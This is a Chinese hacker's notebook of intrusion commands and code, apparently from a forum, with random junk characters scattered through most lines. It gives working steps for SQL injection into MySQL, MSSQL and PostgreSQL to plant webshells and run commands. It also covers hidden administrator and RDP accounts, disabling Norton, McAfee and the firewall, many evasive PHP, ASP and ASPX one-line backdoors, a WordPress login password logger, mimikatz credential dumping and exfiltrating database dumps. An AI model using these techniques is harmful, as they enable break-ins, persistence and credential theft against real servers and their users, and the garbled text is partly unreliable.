' s& B# C7 D; a9 q8 V* \use test;
( s( s3 `+ [9 X( S* ~, q* xcreate table a (cmd text);% a! \ N* X* J) d) P
insert into a values ("set wshshell=createobject (""wscript.shell"") " );! {. ?" r* s6 L
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
% K" X: u9 G! t- Vinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
4 B# Q0 J6 J1 pselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
2 m3 d% R G, W2 Fdrop table a;- x0 Y& W* x: m1 u2 M
0 s2 w( H( @+ }% h
英文版本:1 k% ^: \) t K0 I0 h% Y
( t3 O4 r/ X) Fuse test;
* y. K7 J- v' V+ f8 g! Ncreate table a (cmd text);
- ~9 o0 A# n( t" zinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
4 l6 t) @3 H+ E8 einsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );( \( z( g! R2 S& S' ^9 {, h# T
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
5 J/ Y8 }' B8 h' yselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";7 m- i- D, u. H# m0 N7 b! U$ ~
drop table a;
/ T# V' E1 y E: t3 [% o ^( J( O% H5 J1 S
create table a (cmd BLOB);" U) Z9 r7 b- R) S
insert into a values (CONVERT(木马的16进制代码,CHAR));& K8 M9 |7 k6 B# P$ {
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'0 t. P. Z# Q" a( K0 M1 ~
drop table a;
! a& ^) F. [ H- l+ ^. a2 R1 c0 O, P9 k" p3 J7 a
记录一下怎么处理变态诺顿
( [4 y9 l! K' |9 H" h查看诺顿服务的路径
: k7 Y+ u2 x* j( R& K4 Z" dsc qc ccSetMgr
. H" N3 N% e# q然后设置权限拒绝访问。做绝一点。。
! s* N' c) j5 Ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
4 U" E; d8 x: T, W" ^cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
, r0 G! Z h0 N( ~, ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators; {. a W# S I! r6 N& S' \
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone! m! J3 k8 i! n! i* Z9 v
3 ]* U$ r8 O1 r+ h# H% h6 G
然后再重启服务器( W. x4 y6 N$ v. n1 w6 |% i8 h
iisreset /reboot
9 e, ?3 h/ h# I这样就搞定了。。不过完事后。记得恢复权限。。。。* s$ {3 v- D( b" P: H
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
: T0 A/ A1 d! X' D* M. mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
/ f8 t' ?: y" |2 xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
' w. r P" e7 [' V5 Z: Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F. ?1 t ]& E5 n% z1 ~) F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
2 ?; T7 G* l1 V2 ^6 W: \8 W. B. [$ `1 v; M- B" w |
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
7 A0 [. z+ o! z* c& q: Q+ T' g. k: p$ ?7 z
postgresql注射的一些东西3 w2 ?& s; Z0 M% p3 D6 y; W+ I
如何获得webshell4 x1 {6 ~! |4 e7 g
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
- |! ^" L+ w9 V, Q2 hhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
& T, Q0 B+ T5 U9 |http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
5 G- [3 @( ?2 j# g) E如何读文件$ X2 h) v9 X, m" T5 s
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);! ]& b) d" j8 p7 v2 z, |, t
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
7 d/ ?' |$ o7 X7 Y3 U" d* U W/ Ghttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
$ z' ~8 q: {$ @9 ]: ` a
' G R& H" k, l/ j$ Yz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- ?6 {2 d% Y/ f; H& m }
当然,这些的postgresql的数据库版本必须大于8.X0 g2 z4 [+ b" z7 [. M0 {. `' X! S
创建一个system的函数:* x! G: s+ \6 A5 E) k
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT8 B, U/ d H5 R
# a6 O) Z; m0 ?( G# N7 o D
创建一个输出表:# r- F, ~& E& D) P9 o R
CREATE TABLE stdout(id serial, system_out text), p q4 d( }& K; x$ F! j3 y: \- k, s$ e
0 ^9 i2 O. G8 L4 ~- ]
执行shell,输出到输出表内:8 I) v8 z3 r* F, d
SELECT system('uname -a > /tmp/test')- K W! V e/ }) s
1 d, P9 I* d6 e+ xcopy 输出的内容到表里面;
5 r- X9 j; P% ~: p p/ a0 }" @9 VCOPY stdout(system_out) FROM '/tmp/test'
; N& {7 _: Y5 C% z+ r' f' W, o9 b) p# Q1 Q
从输出表内读取执行后的回显,判断是否执行成功
& f: E4 z/ P6 J* A0 [0 W. y& a6 N+ `& K- J: E
SELECT system_out FROM stdout5 o: ~. F( r2 e, l
下面是测试例子
# v7 a/ ?+ g' ?, ]- Z8 a1 U. |2 a/ t& Y5 ^5 U4 Z* K
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
1 t1 k. ^/ n8 v$ C/ t1 E( ]' _! z' }2 `7 _
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'8 C! p; S7 }4 H% d
STRICT --7 ?$ Y2 t# R9 i- K, f9 N
9 f5 v* d& P. ]; }/store.php?id=1; SELECT system('uname -a > /tmp/test') --4 x* G0 |9 Z. Z# O0 d; i, h8 t2 Y
! O7 @, p: } u7 X# l
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --6 H# F% e% l/ r6 C6 i* @* {
' i% f8 v- s: u6 {6 G/ ~/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
+ j3 U% ^; r( t5 xnet stop sharedaccess stop the default firewall
+ d0 Y y1 ]3 V l+ ynetsh firewall show show/config default firewall
L) |9 A Z6 m% Cnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
& o8 S% U; F& g. znetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall0 d9 v9 { v) e9 s8 J
修改3389端口方法(修改后不易被扫出)
) G5 a2 `; O [( h) G4 i修改服务器端的端口设置,注册表有2个地方需要修改
/ F/ d& C$ b8 ^. l; q" J4 u
. b9 `7 R2 ?7 u7 }- P[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
' N/ ~5 @- `8 Q) i0 b8 }PortNumber值,默认是3389,修改成所希望的端口,比如6000" M9 V) h4 w; q! I2 F, C# T* V T) V4 j
& p! F7 l2 `+ {: f7 Z; w
第二个地方:$ q/ K, o, ]. y, `# ^
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ! U3 V, x& d9 v0 |$ @1 s- j: w
PortNumber值,默认是3389,修改成所希望的端口,比如6000
) O3 t! V7 H1 m3 D& t9 [* o9 f/ D+ i! e' u* J6 h& A |) k4 S) C
现在这样就可以了。重启系统就可以了
. u4 M5 n; T5 z. h( I. d) |9 u, y* G& K' |$ A7 b& x! l9 R
查看3389远程登录的脚本
5 v5 f& q) B* k4 ?( f4 W保存为一个bat文件
2 b0 S& J: M' W6 W2 Y4 |; J& @, Gdate /t >>D:\sec\TSlog\ts.log: l6 ^9 \( A6 I
time /t >>D:\sec\TSlog\ts.log
8 e7 Z2 T3 N/ o4 v: d' a% B& Mnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log, A+ i2 k. |) j
start Explorer
+ [0 ~7 N7 M) {2 f8 _; }* N/ N8 f! O- k, }
mstsc的参数:1 I$ t5 \8 m0 g" e7 A# y
( R& C# O) \. Q4 v$ G2 [ b3 @! P远程桌面连接
$ g5 p. Q9 _6 L+ x5 Z; v v
) I7 @) _4 W9 \+ K. Z7 AMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
' Y9 c; e" Q" ]1 S" j4 b- G [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?9 P3 W% g$ p5 b+ {( N' Z
& E# E4 s. L2 H/ J2 {; [<Connection File> -- 指定连接的 .rdp 文件的名称。
* W9 v! {9 E) N0 k3 B5 _" k
$ j. j' t1 M4 f7 ?* ?4 C2 R( h/v:<server[:port]> -- 指定要连接到的终端服务器。
h( ~; P/ n: E9 `0 k! A+ q# {$ M; M" i3 S' i5 @4 j
/console -- 连接到服务器的控制台会话。# a, D! P+ t! |6 K+ i
" V5 v, j9 g3 t# r0 I# w* l5 J5 D1 E/f -- 以全屏模式启动客户端。( f+ h% \" X7 y: v* \2 k
) A9 u2 R: g( H' {/w:<width> -- 指定远程桌面屏幕的宽度。- V# T3 j; z% @
" Y& B; l' D* O% ~! w% h; O
/h:<height> -- 指定远程桌面屏幕的高度。
* V2 X0 U4 ^- I, Y% r$ A# a6 M, c
9 m5 _ N% r5 E; B/edit -- 打开指定的 .rdp 文件来编辑。
( t8 \ I, G5 T7 {% [6 @% {% _( X$ V/ `$ e4 l$ z6 N5 v
/migrate -- 将客户端连接管理器创建的旧版, N, i$ D6 v1 B0 W- M# O
连接文件迁移到新的 .rdp 连接文件。
( P7 B" `! J% r) Q( y( v' Z" `$ Z
! o) y2 \( ]. `: I1 p
x( H0 j8 x1 b& @2 [其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
+ e5 b% k' Q/ {( `% v _mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
/ K7 @- P* V' o+ u* c4 w9 p+ C9 A4 t0 _; Z
命令行下开启3389$ S/ f2 [ p5 f4 q" |) n4 w: V( O
net user asp.net aspnet /add% F8 a; m& J6 H4 I" i
net localgroup Administrators asp.net /add# p) _3 M U4 E; V5 r
net localgroup "Remote Desktop Users" asp.net /add
& m" K3 k5 ]2 O8 Q; uattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
2 {0 x% z8 Y- T$ D+ Cecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 02 C& o7 @# K* U! b! V
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
& r7 u* x- u+ [) _/ H; Z5 H0 fecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
$ W) w2 z0 H( w# ?/ U! asc config rasman start= auto
( O' C3 x. O& a; o3 zsc config remoteaccess start= auto
6 T! ~( h4 k/ R3 T3 b5 inet start rasman
2 y. D4 \* v. ?* O* D& B) B# u5 unet start remoteaccess
; o7 L' L/ G3 m; Q' i+ ^8 _% q$ L5 CMedia
9 h* g+ m$ G8 P( V- q" r9 C9 z @<form id="frmUpload" enctype="multipart/form-data"
" q! L" F3 ?7 z) [action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>1 [# p, o7 c e" P
<input type="file" name="NewFile" size="50"><br>% v3 y7 N$ z9 f+ w* `
<input id="btnUpload" type="submit" value="Upload">
2 f$ I. `2 `6 o+ ~6 Z$ D4 ~</form>
& R- D E9 g5 U- \3 p3 X6 G% {3 g" g( Q; x* W, ~
control userpasswords2 查看用户的密码
% k! l5 m$ b( l( y8 L* ~/ Y9 ]access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径2 M, B$ V. ^. l. v
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
9 Y. f+ W5 F; Y% D2 ?/ C9 q9 ~* I- M9 w/ y7 L8 q& O) c' r
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:6 ^, d# t Z/ i8 M5 r6 ~4 ~
测试1:' W, j5 @( Y/ l! P
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t19 C+ Y& [; d6 ?: D9 a- N, k
! u4 K% X4 R1 g$ i' u; l1 q. n
测试2:2 r1 K3 U$ N) V
# {6 |( a5 A; `9 Z; x5 x6 w
create table dirs(paths varchar(100),paths1 varchar(100), id int), e# @3 i) E: J( s% Q
2 C9 D) E0 \' |+ K8 e8 Sdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! q% }2 e' {$ V. \: x% g' \" a
E# P! c; P+ LSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
7 ~; h& y' H9 `/ Y* V关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
z# c- g: o! S1 x可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
- a+ o+ k: s6 g0 ^8 _net stop mcafeeframework
. C0 O7 y- E2 g. G3 C7 u" ?( _) Onet stop mcshield' q8 W8 `9 e1 ^; S. n
net stop mcafeeengineservice
$ n7 n& `8 U7 d( s: F: gnet stop mctaskmanager
0 R3 ], [3 Y9 h k2 Mhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D* N( V$ j# \. C# A
. c0 L/ }/ d! d) R- l; U
VNCDump.zip (4.76 KB, 下载次数: 1) 3 F! w2 \3 I: t& D: d
密码在线破解http://tools88.com/safe/vnc.php
9 g+ M- i9 n, }4 b. wVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
, h' i. k! E* O! W( r& b2 R0 k9 Q- Z; m
exec master..xp_cmdshell 'net user'8 L3 {' A/ n; f5 @1 R1 z
mssql执行命令。
8 K2 z6 ]. f0 ?+ W3 c获取mssql的密码hash查询
& M$ }1 E6 z$ N9 |3 Rselect name,password from master.dbo.sysxlogins, _1 j$ t- G; H6 A( T
* z# D+ W2 t" [6 A/ U& R5 L
backup log dbName with NO_LOG;& }2 Z$ v8 ~: V' m. e" ]& K- n& N
backup log dbName with TRUNCATE_ONLY;
: `/ w( b1 z- w4 CDBCC SHRINKDATABASE(dbName);
+ ^. @$ C" m: e) B/ {mssql数据库压缩* i' f5 J2 M& u$ Y
4 ^+ ~- i0 o; Q3 _6 {) t
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
0 q- m& d6 j. o: ~# C将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。! E, p& s% Y4 K; k3 V* M7 q& ^" w @5 ^
9 Y- H8 R1 d8 \6 Z
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
3 I: Y( F2 l0 ^3 S备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak( `& C- ?! P; {! h6 p$ E g
7 ]. n* O2 X# I. u& B/ ~0 Z; {Discuz!nt35渗透要点:1 L: Y8 r. W( Y& H( R$ Z
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default1 W% s8 G& X5 Q# Z/ H: m: b$ f
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>0 @' p6 ?/ X$ L4 X$ U
(3)保存。' L$ j' P# B" r% G5 `
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
+ u1 P l6 F7 ~# j' h; n, Y, ud:\rar.exe a -r d:\1.rar d:\website\$ L( T9 S! [! D
递归压缩website% y5 C/ L. Q5 t/ J( a
注意rar.exe的路径( t& }, @# r! @
* h0 u! r# T. b# ]<?php
) n7 O1 A$ P0 |, s
+ d5 c1 y: {$ _$telok = "0${@eval($_POST[xxoo])}";1 Z2 V. s: P5 k( }' r
7 \; N6 q% y& |3 y" w2 T' Q& F! g! U$username = "123456";
. {& }* g$ _) L9 y0 l7 i. j- \; z3 W. @: q+ d" V8 I. K5 s
$userpwd = "123456";8 @5 ?9 O q4 Q
4 i6 i+ V6 L- C
$telhao = "123456";2 ]/ r* k0 `" p7 j* A
, z+ q5 _' Z, P! X: i
$telinfo = "123456";( _# }% D5 d2 {! r [1 S9 X$ j4 ]
9 C/ i% D9 v9 O. l e3 y7 [
?>* _" A5 Y9 E% ?: `: O2 u' E
php一句话未过滤插入一句话木马
* W7 A# |! T% @: Z- R& X
) O+ j1 m4 \1 L1 p$ H站库分离脱裤技巧
1 i" C! j* E. h5 h2 X4 }exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
7 O2 _4 G( Z! Q* p7 [3 g3 b- hexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'+ ?* \6 v6 ?! E! o/ }% m& G# S( d4 J
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。8 p3 Y: G% e" p- d6 q6 N
这儿利用的是马儿的专家模式(自己写代码)。
9 ?7 S H' i0 E! Z2 l4 c3 yini_set('display_errors', 1);* f! ]4 q* U5 A0 v C8 g
set_time_limit(0);' t! A1 G0 p) D. @9 y7 k9 u7 }0 z
error_reporting(E_ALL);* {' K f0 o" L' b0 O( q
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
* Z4 _! w9 O; Amysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
' K. U- W0 z& }0 Q7 b$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());% p! a. ~2 @2 |: c* k
$i = 0;
( u9 r% D Q3 I7 O! I$tmp = '';5 |& M" u( G, S: ?1 A, c
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
* h0 d1 N3 s: ]! m, Q $i = $i+1;
, b. ^6 h; u( \* s# o* ^" C $tmp .= implode("::", $row)."\n";" A; @1 k0 S, [1 b. [2 l
if(!($i%500)){//500条写入一个文件- X9 _; c# T" v, ^2 p
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';2 ?9 R4 |" r3 t$ N! O: R$ p
file_put_contents($filename,$tmp);
% `- W7 [0 L* b- l $tmp = '';8 i. b& G% W* ^& r
}
, p& m, T0 f4 s3 A}* H( [2 U- a. B" ?# A' G2 d" M
mysql_free_result($result);
: L& S! ~! @: [! p* i: E2 h3 B% y: a4 r/ w9 Z5 h4 F; B/ g4 l- j
* Z, A+ s' _# b3 Y
" a+ ?1 y+ D" E: |) c7 T
//down完后delete8 [, \* @7 P, ], e; k+ [
( Q, \9 Y; G; d8 V' `
! M4 M! x9 R% z+ Dini_set('display_errors', 1);0 ?0 g p: h+ ]9 H/ w9 n
error_reporting(E_ALL);
( {- b5 W; \4 b6 H3 o; _! `' V$i = 0;
?+ u1 l( w( Q+ G2 t$ E1 ewhile($i<32) {
" U$ N, E" P4 b: { $i = $i+1;6 `1 N6 `# Y4 l6 o1 X
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';+ u# q# f V6 ^% l j) z* D
unlink($filename);
3 t& N6 X; n# o, w} * Y% D& I. m/ c& {! @
httprint 收集操作系统指纹
8 _: B9 ~9 z0 h! g4 U扫描192.168.1.100的所有端口
2 i! r3 Y9 N8 F' V9 ` @nmap –PN –sT –sV –p0-65535 192.168.1.1003 m# V3 I# w2 R6 W% a/ Q
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
: A9 K1 D* P/ q+ `* `' |& Xhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输! b8 \0 q9 V \' L& c- N
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host S4 ^) V1 J/ ^
x: `: v; a* X' n; E! dDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)4 p) v5 T0 k' O: P D
3 @$ N, b9 D3 Q) E4 \/ a MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
# u( s' e; X; _9 _/ R5 p2 H' d: Y7 Y4 e
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x' J$ }8 v; h+ C, t1 [
+ O; Q: f/ m8 V. V! y. P: t
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
9 J: S! p* Z; Z, I% |1 T; W" L2 ^, m* @% U5 u% G- X
http://net-square.com/msnpawn/index.shtml (要求安装)
' A0 X4 G# g- @ {) F+ F$ u" C& U) o2 o2 P
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)4 a+ e3 D/ |0 }; F, _, {/ A+ U8 N
) [ O% \- a5 y p! m) M1 R
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)3 B1 |3 x7 ^5 u
set names gb2312
: X- w. J( g) r! B( B0 [导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
' ~0 v( }" z2 Z+ V* R
) P7 t. T7 z4 Q3 v3 `+ V" o- wmysql 密码修改' R# D! f/ I5 p
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” & G9 p: H. X5 ~- j4 ]; }. s
update user set password=PASSWORD('antian365.com') where user='root';( G: Y, P! [6 g5 j2 J1 v: b% W
flush privileges;, @6 X. {3 u, R
高级的PHP一句话木马后门
9 B( t3 Z, m: K5 }* n% L# |* p8 y$ t- c$ V, w" `6 U% @! h
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀* E# G% c. s$ q& r* d! j
/ H8 ]4 O3 _. g5 V5 W" o$ Y& e! Z1、
k0 [$ N' V z% i
' @2 K+ }0 r1 Y2 u2 _0 S$ j$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
" V! d6 v1 @: u* h/ e
: r4 ]1 l4 ]& W5 G- a$hh("/[discuz]/e",$_POST['h'],"Access");6 r$ L+ a% p1 }+ Z1 L( C
' h% `* _9 A- n1 i4 x! Z//菜刀一句话
0 q1 U# a2 S( O E% e
/ p' E4 i4 v" x2、
, \) I# B0 c' c7 a
' ?) j, X' j. o$ A$filename=$_GET['xbid'];
I- z; B4 [* o# _: c
8 p( q; [- i i0 p: ?' {5 V1 d" n$ Tinclude ($filename);& Q' [( N6 w9 n
4 x ~3 R1 r' o* E; D//危险的include函数,直接编译任何文件为php格式运行
( f4 n: {8 h2 I: R6 K; S( x% V
3、2 ?) c1 o. ]1 x" A
3 i' [# o- y: P5 I2 e, X$reg="c"."o"."p"."y";& u3 Q2 D: d8 J0 O
: |/ s$ h" r/ y5 M h9 f- S1 b. |1 b" I$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
% ?( m& E% {; ^# A R6 s3 A- F" G6 P1 c1 ?: }' ^) F
//重命名任何文件+ Y9 Y/ F% c8 t
, U5 c) U# A1 _
4、4 b o% [* \0 L9 v
9 C/ f6 c# F" s' W8 K0 D$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 ?9 |. A% V6 {8 {8 {! Z
9 b/ y* v# Q6 F' p
$gzid("/[discuz]/e",$_POST['h'],"Access");
# n! p" u" [; n( k- i
5 j! T% }' @: p2 x, K* d//菜刀一句话& i: e' N1 k& S0 ?, u
; `% S' r- @5 E; H7 k |/ _% I5、include ($uid);
% _$ K( s! w" X$ f/ |; ], }$ n1 E) M5 Q6 M
//危险的include函数,直接编译任何文件为php格式运行,POST ) q* y, ]4 L: H9 l- [2 X6 Z, v
& \+ n% X" Z/ A L2 U# e8 |) h" f, w2 g
//gif插一句话- V- @2 w+ X& K4 b9 c2 f9 z- l
2 J, ~& b$ M+ u6、典型一句话
1 b, d6 \; { y1 s, G( j" a3 E+ `
2 g3 e/ d! z; L8 ~/ T8 f# J程序后门代码
/ [$ h1 l1 `8 g0 u# Z' X<?php eval_r($_POST[sb])?>3 O; O0 o1 o6 U- l
程序代码
' y0 j$ T- R' t- z. P9 v<?php @eval_r($_POST[sb])?>
3 u. U- E" I* V6 L' G! p//容错代码
8 H& q1 D$ b! l5 G程序代码
3 y6 {6 c# M" M+ w<?php assert($_POST[sb]);?>
/ F K4 I5 b3 z$ m: G6 L7 o//使用lanker一句话客户端的专家模式执行相关的php语句
8 ~, p! X4 P6 x. K2 {程序代码9 n ?- x8 O. z8 {4 P0 w3 p- W: _
<?$_POST['sa']($_POST['sb']);?>
" {8 Q2 ~# O' N, m8 @6 D4 ~程序代码( S1 W9 k; b8 \3 h5 f8 Z
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>( R; z6 H4 m4 c
程序代码% Z0 O" }! M1 e5 p. O
<?php
8 w( d% A, ^/ l: \@preg_replace("/[email]/e",$_POST['h'],"error");0 n* W7 b* t1 d- n
?>, }3 q8 C5 h6 j0 V# |
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
6 `7 ]: J1 S( p- P/ R程序代码
) N" M/ L( e) z. o' A' }; d<O>h=@eval_r($_POST[c]);</O>
% N4 C9 X, h9 [6 F! `7 P程序代码
$ d: K6 d8 s3 b- Y- K7 `<script language="php">@eval_r($_POST[sb])</script>% z% l3 h$ D$ l! ?% w- V
//绕过<?限制的一句话, `4 E- Q! Y7 b" C+ q+ r6 t- A6 m+ X+ t
: E, Q8 E7 g. D0 Phttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
/ S' y! p7 H" F( p9 J4 ~- H详细用法:: u! @2 P" j& f+ A) ]
1、到tools目录。psexec \\127.0.0.1 cmd
" f* |8 b2 @1 q; @' x) R2、执行mimikatz
; i; G- t, W' I3 a' A3、执行 privilege::debug; M6 r4 d4 i3 b5 G; S
4、执行 inject::process lsass.exe sekurlsa.dll
3 H. X% I3 ]& ]7 M# z3 T5、执行@getLogonPasswords8 N( q6 e1 F) u- z$ E+ W( @
6、widget就是密码
$ q `8 k/ [7 n7、exit退出,不要直接关闭否则系统会崩溃。! Q. C0 m& E0 d9 q3 a& i
7 u! S8 z& [" [3 F" ~http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
7 u# f ]6 A# k8 c
# ?; ~- i- k" Z; I自动查找系统高危补丁- i0 _* T! }8 C; @. Q, ?
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
. x! V \! R7 k1 C7 c
3 Y7 y) h1 x% i+ G. u2 }* R突破安全狗的一句话aspx后门, \! ], ?1 T9 Z. m ]
<%@ Page Language="C#" ValidateRequest="false" %>
6 w6 f) k( t) d5 A! L<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
1 n( m: i! a" c3 p5 hwebshell下记录WordPress登陆密码
) G$ X6 z5 z L. r" J" r/ mwebshell下记录Wordpress登陆密码方便进一步社工8 c5 b+ y" n8 |/ m7 e
在文件wp-login.php中539行处添加:
( K1 E: n" `. b0 H7 o; Q// log password
2 K( B) A% s7 L7 P$log_user=$_POST['log'];
* t6 g! z0 e. d$ y! n6 F8 i) B$log_pwd=$_POST['pwd'];
5 y9 X( I6 T2 Y' c. j% u$log_ip=$_SERVER["REMOTE_ADDR"];" c: i; C" M) ]
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
6 ]0 @# F3 \2 \7 t/ r) [' g( g$txt=$txt.”\r\n”;
7 C% U9 n. ~! vif($log_user&&$log_pwd&&$log_ip){
6 L& C8 e. v' b4 Z9 E9 p( M7 b' `@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
8 t7 u3 v) w; {}
4 A# N: l: w- U0 D8 p: @/ n7 r- s3 ~/ ^* F2 V当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。5 y. i5 d( ]7 l. i: k, l
就是搜索case ‘login’
6 I6 o V. H7 x1 s0 {, K在它下面直接插入即可,记录的密码生成在pwd.txt中,. s/ Z8 q g- H( m
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录7 W$ p, g F h5 @$ |6 b4 x5 S
利用II6文件解析漏洞绕过安全狗代码:
! o" {$ D* [& g* b* Q) `* T;antian365.asp;antian365.jpg! Q# f* V U6 [! Y/ l+ R4 w
